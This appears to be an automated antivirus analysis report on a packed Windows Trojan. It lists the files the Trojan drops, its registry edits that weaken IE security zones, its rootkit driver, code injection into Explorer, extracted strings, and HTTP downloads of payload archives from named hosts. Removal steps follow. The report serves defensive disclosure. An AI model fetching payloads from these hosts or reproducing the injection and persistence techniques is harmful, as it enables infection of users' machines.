MD5: 3d0fa2e20e7ae92f35e37cb9e858988c
SHA1: f75433d7bf945c700ac4fbc2914a159504341e09
SHA256: 5527eff443b7e8bb2c8b14f3c5aa88af8301dc93025997d9d24d303e8255ca07
SSDeep: 98304:jgWLgOuyy6yW2chxAp2SQVk5bp6FYskEhiN4xQHvPOoXlpSLxpB:fkshuCVk5l6 skCW4xQHvPOaTSdpB
Size: 4390912 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2016-03-31 04:58:28
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

ping.exe:2020
%original file name%.exe:2024
LMIns.exe:228

The Trojan injects its code into the following process(es):

Ììʹ.exe:872
Explorer.EXE:884

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Ììʹ.exe (17629 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\LMIns.exe (5442 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\1192515 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1192515\TemporaryFile (0 bytes)

The process LMIns.exe:228 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~tmp_hl\mslmedia.inf (2 bytes)
%WinDir%\Setupsti.log (8282 bytes)
%WinDir%\setupapi.log (3776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_lm_delself_.bat (101 bytes)
%WinDir%\inf\oem11.inf (2 bytes)
%System%\drivers\SET4.tmp (27 bytes)
%WinDir%\inf\oem11.PNF (11641 bytes)
%WinDir%\hllog.txt (13 bytes)
%WinDir%\_ntdll.bak (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~tmp_hl\mslmedia.sys (1176 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@rambler[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@aaa[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@twitter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~tmp_hl\mslmedia.sys (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~tmp_hl (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@abmr[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%System%\drivers\SET4.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~tmp_hl\mslmedia.inf (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adnxs[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adgear[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[3].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tns-counter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@scorecardresearch[2].txt (0 bytes)

The process Ììʹ.exe:872 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\ÁÙʱĿ¼λÖÃ.ini (46 bytes)

Registry activity

The process ping.exe:2020 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "16 85 A6 44 11 2A 37 D4 FF 89 60 A4 10 B1 2C 1A"

The process %original file name%.exe:2024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 69 C5 A8 F4 25 72 72 B5 81 DE B5 77 E8 2D F9"

The process LMIns.exe:228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem11.inf" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"FSFilter Activity Monitor" = "04 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\System\CurrentControlSet\Services\Mslmedia]
"DebugFlags" = "0"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem11.PNF" = "1"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"_lm_delself_.bat" = "_lm_delself_"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 83 B3 4D 2F 21 AA FF 10 26 B3 07 66 72 74 26"

[HKLM\System\CurrentControlSet\Services\Mslmedia\Instances]
"DefaultInstance" = "Mslmedia Instance"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\System\CurrentControlSet\Services\Mslmedia\Instances\Mslmedia Instance]
"Altitude" = "370030"
"Flags" = "0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process Ììʹ.exe:872 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 D5 7C D0 1F D9 24 13 50 62 85 49 13 F4 46 32"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\[email protected],"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "%System%\DRIVERS\Mslmedia.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.

Propagation

VersionInfo

Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????
Comments: ??????????(http://www.eyuyan.com)
Language: English (United States)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://hlsys.oss-cn-shenzhen.aliyuncs.com/updatever.rar
hxxp://hlsys.oss-cn-shenzhen.aliyuncs.com/wkmdc.rar
hxxp://hlupdate.liu1xia.com/updatever.rar	120.25.112.8
hxxp://hlupdate.liu1xia.com/wkmdc.rar	120.25.112.8
hlsoft8.laolaoma.com	120.25.144.64

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /updatever.rar HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36

Host: hlupdate.liu1xia.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: AliyunOSS

Date: Tue, 12 Apr 2016 13:57:00 GMT

Content-Type: application/octet-stream

Content-Length: 43093

Connection: keep-alive

x-oss-request-id: 570CFEAC8051B2B0D65741A8

Accept-Ranges: bytes

ETag: "CC9E7A6455FB651F1FBE2230F30CFD19"

Last-Modified: Tue, 05 Apr 2016 14:30:38 GMT

x-oss-object-type: Normal
x...}xT..0~&s....3....2... ....I4.L....!3..D ...J...J..3..lF.{...z..{.
...V1.*N.........h..8Q.@> ..k.33......<......s.9.c....^k.}N.....
s...OU9.....r...>.M........:.E........j........c.]w..'.J..n.l..b..'
..Un...].a~ff.5....?\.Z..l....?.. K......y.W.~..|..K.<.%K.<...}.
'..gq.v}..KW.s...]9f...V.R..czo"..K.5^7..N...Z^.*.....;.O...x.D...1.}*
..Xkd..j.S3u.rH..:n.f........n.q...3.-F..4.q.t...|i.........d..ca...oY
..t'.....{.......[8_..=.....I........e..........d..#.-.6.....j8...^...
.p........v..........D......9.9mq.d..S.p..5e.[JU.-.t...;S.C?k..=E..i..
..)q\..W{...z];)..u...o9...ZUU..a...Ha.q...*...`D.<..C..`......[M..
b ....5...H.#.-....YW...../..]._l~..-..w6..N._..=.......>.(..v.....
..n$.c`.u0.V._..O% [email protected][M:j ..._...#6x.N.)\|....6..
e......-..k66M,[.|.....@c...*`;..#xt..fSN..P..*5..X. .'..o.k....qLT>
;C.Tz...h...x.u).t.S.G.G...2.R..]...O(RvZ..|-....l....W.ia>........
.k2.....!...o...h...ti....!C...L....uc.\...._.B0.c.9Zk...} [email protected]
...."......j......ej/.1..7./.E.H*...6..B..../.)'...X.t...M`....J..j...
6..p.|..fd...r:0*......C...>,[email protected].]..Iz...DR.).m.... .]g.R...
.#f.F..%..@. )...htU.M..%...8:A............c........~.1....g....8.... 
.....9R._6g...J/}l89!9.I.[.&}[email protected]>...Hk;..J..
...$E.......X..~67...W...qV7...............8....y.^.../r...1\.....'..z
.....]Z.... 8#C...v)...nNV.(......W!....Gp.|xE.j. .&.... .J.2...3B4.6A
..9.tF..P......2}...FU..y....|..{. .......^.%.....d5.D...44.... .v....
.5Vc.69[W..dH)......b.)[email protected][email protected]"........=.
<<< skipped >>>

GET /wkmdc.rar HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36

Host: hlupdate.liu1xia.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: AliyunOSS

Date: Tue, 12 Apr 2016 13:57:02 GMT

Content-Type: application/octet-stream

Content-Length: 370673

Connection: keep-alive

x-oss-request-id: 570CFEAE8051B2B0D65743D5

Accept-Ranges: bytes

ETag: "191F21CC190122C479F0C6DFDAC5E98C"

Last-Modified: Thu, 31 Mar 2016 04:56:22 GMT

x-oss-object-type: Normal
M.....P.t....o@p8..``..`......0 .000.p.P ..p0p.0`00...p..P.P.....O..`.
9M.x.|-!dX9.....g2..P.A.^.$.B%.2.n..>pt.c.].4.>..Z...`..`..hj.'9
$..94...tH..n.=.4.i..XO..(i....Ydh..7.R..h../..iT.7.EX.I.HNA....$8...X
.9.H.......xb...'.$.0P...pP.P......`...6.. ...`[email protected].....`...0Pp..w.
.. .P.P .. ....@.@ .P..`..@..`%....  P.....T`.... "0..@.`0.........`.@
[email protected][email protected]@[email protected]`. ........P.0. [email protected].....`.....
@.P.`P........P`......00P..p..0p..p.A..a.`.P``p....`[email protected].
........@[email protected]`.p..0..............1da...1. [email protected].@n.@.`P.......
pp...0.4.41@.`......q ...0P.1p0..`..@.``0..p.P..S.....tQ..`[email protected]...
`.....@. ...p.P.^R.....P...`[email protected]..@@@....P.....0.R.. `. ....p.P 
...0.p0p.`@. ......0.p ..@. [email protected]...... ...0... .. ....Pp...
0....`.p......P.`.....pp......P.P ..P0.`... .......P@.@. @p..0... .@ P
..`.p...``... .p`@ .@@pp`...@....`P.....`...0`0.....P.P0.P.`.. . .@0@.
`[email protected]@.....@`.Pp.. @@.......0........... ...@`0.`.0 [email protected]
@[email protected]`p...P....pp..P.pp [email protected]..`...@{....,...|\l.\......
..,,.L.<........l........L..[Dd.. (.$.4.....P,....L\.l|.|.,L. 4..C.
TW].D.o...1..X./.  V...;..`[.?.....l..l.,....U).........1Ld.Q0.A.!..P 
..y...[....BP.R.P.."<P..\.\|.\.L.....H.G1..1..p0..x.A..t.}4D.d..0.@
...Dw.x...s..p.0.q0I..........q`..$H_..9.|Y...4D\....[\tdD.]....9.....
..,,\<...|..Q......V.T.1.)[email protected] ...t...
.....@.`[email protected].`@.P;.,.@D...~..........`.p..`.` ..T..../
_W.t0/.`..T........9.s.....,..<..cV......'K.H..Q......$.......D
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

.text

`.rdata

@.data

.rsrc

t$(SSh

~%UVW

u$SShe

GetProcessHeap

\AudioSes.dll

\CEGUI.log

\TenSRL.dat

ssF.data

2=%F_=

2%U{Q

weQmw.qg

%s1><

Yq.Aa

kx.lR

.aP6=

i.KF(

.MBW|

A}QpD.CV

.zsM5K

3.RZ_

{zR

.AH~/

.Sqv^mm

cscapi.dll

kernel32.dll

user32.dll

advapi32.dll

oleaut32.dll

gdi32.dll

shell32.dll

version.dll

MSVCRT.dll

SHLWAPI.dll

RegCloseKey

ShellExecuteA

_:%u@

Q5%Sx

@.HD_

?b=ssH

M|.QE

w#%xf

4)EB.LEy

2%0X2

.qR{[

\.Ne7]

G7.CFn

ÀiH%$1g

b.ln1

n:%u|

pp;%F

GJma%Dtj

n .in

^t.KnR/k

%S6=f

%CRyDL

O[.cC

f .iF

%X6RU

2i;r%Fu

.Edqn

.ud8I

%UPor

QTTcp

)*w.yB:

E5u.IgySB

erhD.yY

JL)%cP

P,<%Sl

6%Fi~

n.uJC

o2OSC.KF

%D%u*

P9|bY.kc

_{.Qd

M.Gd0

UP%s-

x0Y\.Ne

L6Bw<%d

`.ESc

.hF){

.wA@!yH

>%U,N

.JPTv<

.mrA_

=.Wx5

=~V9.nP

(Of1}2%C

KBI.EuQ

.KePA

G2.aW

DTCP

xW.rH

]%uyYPXA]

.fGj0op[

>L.Zc

iCXV%d

.uu&i

=.sj]2e

,%UmNm

:@Z%f

P@#h%d"

IfTP

=.WB5

.hlp<

.idata

.edata

P.vmp0

`.vmp1

.reloc

P.rsrc

1e.ro4A

H0.gW

comctl32.dll

d.jF/"

r#'%C

6.Xdp

g|$^.Cn

>.bM8

>Z.Ye

w4R`$p%s*

f.zo~L^

wsock32.dll

ntdll.dll

Ë.L@

l.sQ{

c-t{.FF

b#I".wM

e.ENZ

xip.tu

@>.vO

%FX2Fsi

qKT.jLka

3.LD7

Uq

G,.gd

<.cFF=j

&8.XMj

$~O.Ba

)].Wd

/_{M%U

Q%s6|

lVfeVg

 !%uO

mh.ud

m%Csn%

kq84.QaI

)f%fg

.SuDYw

K)`p.frC

*%s!%

aR.dDb&<y

.xk 4g

)%S{.

'U}.Ue

l%S(8x$!(

1L%UJ

.vtbw

.iA5N

yyhKa%S

d.Zd=#R

x0r%F{

.IPi)

Vj.jH

>M%X9

/8[<{~@ 

bc.lTk

ks_GetMsg

kssPlugin.dll

tole32.dll

%d&&'

123456789

00003333

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

WinExec

KERNEL32.dll

GetKeyState

USER32.dll

GetViewportOrgEx

GDI32.dll

WINMM.dll

WINSPOOL.DRV

RegOpenKeyExA

ADVAPI32.dll

SHELL32.dll

ole32.dll

OLEAUT32.dll

COMCTL32.dll

WS2_32.dll

GetCPInfo

CreateDialogIndirectParamA

UnhookWindowsHookEx

SetWindowsHookExA

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GetViewportExtEx

comdlg32.dll

RegCreateKeyExA

.PAVCException@@

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

Kernel32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

.PAVCFileException@@

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

1.1.3

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCArchiveException@@

zcÁ

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

#include "l.chs\afxres.rc" // Standard components

9.5.25.212

(*.*)

Ììʹ.exe_872_rwx_00C68000_0000C000:

x.yvr

x.yvkd

x.yvw

x.yvq5v

Ììʹ.exe_872_rwx_00CFD000_000CA000:

version.dll

user32.dll

shell32.dll

1e.ro4A

oleaut32.dll

H0.gW

comctl32.dll

advapi32.dll

gdi32.dll

d.jF/"

r#'%C

6.Xdp

g|$^.Cn

>.bM8

>Z.Ye

w4R`$p%s*

f.zo~L^

wsock32.dll

ntdll.dll

Ë.L@

l.sQ{

c-t{.FF

b#I".wM

e.ENZ

xip.tu

@>.vO

%FX2Fsi

qKT.jLka

3.LD7

Uq

G,.gd

<.cFF=j

&8.XMj

$~O.Ba

)].Wd

/_{M%U

Q%s6|

lVfeVg

 !%uO

mh.ud

m%Csn%

kq84.QaI

)f%fg

.SuDYw

K)`p.frC

*%s!%

aR.dDb&<y

.xk 4g

ShellExecuteA

RegCloseKey

)%S{.

'U}.Ue

l%S(8x$!(

1L%UJ

.vtbw

.iA5N

yyhKa%S

d.Zd=#R

x0r%F{

.IPi)

Vj.jH

>M%X9

/8[<{~@ 

bc.lTk

ks_GetMsg

kssPlugin.dll

tole32.dll

kernel32.dll

Explorer.EXE_884_rwx_01CA0000_00001000:

PID=1184(0)=1=0.0.0,0_0x0_0x0-0x0-35_0_0,fg=1,rmv=0/0 %WinDir%\Explorer.EXE

Explorer.EXE_884_rwx_01F00000_00077000:

.text

`.rdata

@.data

.rsrc

@.reloc

tGHt.Ht&

deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly

1.2.3

inflate 1.2.3 Copyright 1995-2005 Mark Adler

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

operator

GetProcessWindowStation

USER32.DLL

error in ReadProcessMemory , RVA=X sizeread=%d ret=%d Error=#%ld

error in WriteProcessMemory , sizewrite=%d ret=%d RVA=%I64X Error=#%ld

error in VirtualAllocEx , size=%d Error=#%ld

kernel32.dll

actth3.0.1

X=X

%s%d.%s.%s

---thisid=%d,drvio=%d, %d.%d.%d, moddenies=%d,codechgcnt=%d,dbg_flag=%X logstep=%d, uidfg=%d,codechg=%d,cw=%d, gid=%d,byid=%u,vbyid=%d, cfgflag=0x%X,actrunning=%d,netava=%d,netini=%d, nopc=%d,actc=%d,inopmm=%d,udppostc=%d,%s

---IJ=%s shdata=X idnotmch=%d tmused=%d,c_send=%d,c_recv=%d,fver%d.%d.%d.%d dllver=%u/using=%u

HttpDown run=%d,tsk=%d

UPOST:%d

P%d parse error

P%d 0xX,%d/%d step=%d,pst=%d ,%s(dw:X)

no udp post object

_hlmk_3.tmp~

No ID again,preid=%d, X line=%d

hXXp://%s/%s

-- [%s]-%s- %s

saveurl

c:\Windows\UrlSave\

hXXp://%s/soft/%u_%d.rar

Ole32.dll

ole32.dll

shell32.dll

hlrestart.bat

ping 127.0.0.1 -n 8

ShellExecuteA

locker32.dll

locker64.dll

DriverImpl64.sys

DriverImpl32.sys

XXXXXXX

netcfgurl

error in CreateFileMapping #%d,pro=0x%X,size=%d,name=%s

error in MapViewOfFile #%d

error in OpenMap #%d

%s=%s

HTTP/

ws2_32.dll

[%d]%s

d:d:d %s

d-d-d d:d:d %s

d_d_d.txt

advapi32.dll

ReportEventA

FindFirstUrlCacheEntryA

FindNextUrlCacheEntryA

DeleteUrlCacheEntryA

FindCloseUrlCache

HttpQueryInfoA

InternetOpenUrlA

wininet.dll

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36

#%d ,sess=%x url:%s

%d.%d.%d.%d

%s:%d

ntdll.dll

iphlpapi.dll

%4X:%.4X

%4X:%.8X

error in VirtualFreeEx , RVA=X Error=#%ld

-115726016"

kernelBase.dll

user32.dll

user32=%d/%d

.JPEG

hXXp://

d:\programs\out\HLSys\Release\locker.pdb

GetWindowsDirectoryA

KERNEL32.dll

GetCPInfo

GetConsoleOutputCP

GetProcessHeap

locker.dll

erroffset passed as NULL

this version of PCRE is not compiled with PCRE_UTF8 support

PCRE does not support \L, \l, \N, \P, \p, \U, \u, or \X

POSIX named classes are supported only within a class

POSIX collating elements are not supported

!"#$%&'()* ,-./0123456789

!"#$%&'()* ,-./

!"#$%&'()* ,-./012345678

!"#$%&'()* 

,-./0123456789:;

!"#$%&'(

$%&'()* ,-./0123

$%&'()* ,-.

!"#$%&'()* ,-./01234567

!"#$%&'()

Dbgview.exe

\explorer.exe

.?AVCUDPDataPost@@

.?AVCThread_UrlSaving@@

.?AUIHttpDownNotify@@

.?AVCHttpTask@@

.?AVCHttpDownService@@

.?AUIHttpSessNotify@@

.?AVCHttpSession@@

.?AVCWebHookHandler@@

192.168.

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

6)6/656;6

5'5-52575>5

=#=,=3=8=?=

?'?,?0?4?]?

8%8u8

0 0@0`0|0

=$=,=4=<=|=

KERNEL32.DLL

mscoree.dll

\msctf.dll

\uxtheme.dll

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Scan a system with an anti-rootkit tool.
   
2. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   ping.exe:2020
   %original file name%.exe:2024
   LMIns.exe:228
   

3. Delete the original Trojan file.
   
4. Delete or disinfect the following files created/modified by the Trojan:
   

   %Documents and Settings%\%current user%\Local Settings\Temp\Ììʹ.exe (17629 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\LMIns.exe (5442 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\~tmp_hl\mslmedia.inf (2 bytes)
   %WinDir%\Setupsti.log (8282 bytes)
   %WinDir%\setupapi.log (3776 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\_lm_delself_.bat (101 bytes)
   %WinDir%\inf\oem11.inf (2 bytes)
   %System%\drivers\SET4.tmp (27 bytes)
   %WinDir%\inf\oem11.PNF (11641 bytes)
   %WinDir%\hllog.txt (13 bytes)
   %WinDir%\_ntdll.bak (4545 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\~tmp_hl\mslmedia.sys (1176 bytes)
   C:\ÁÙʱĿ¼λÖÃ.ini (46 bytes)

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.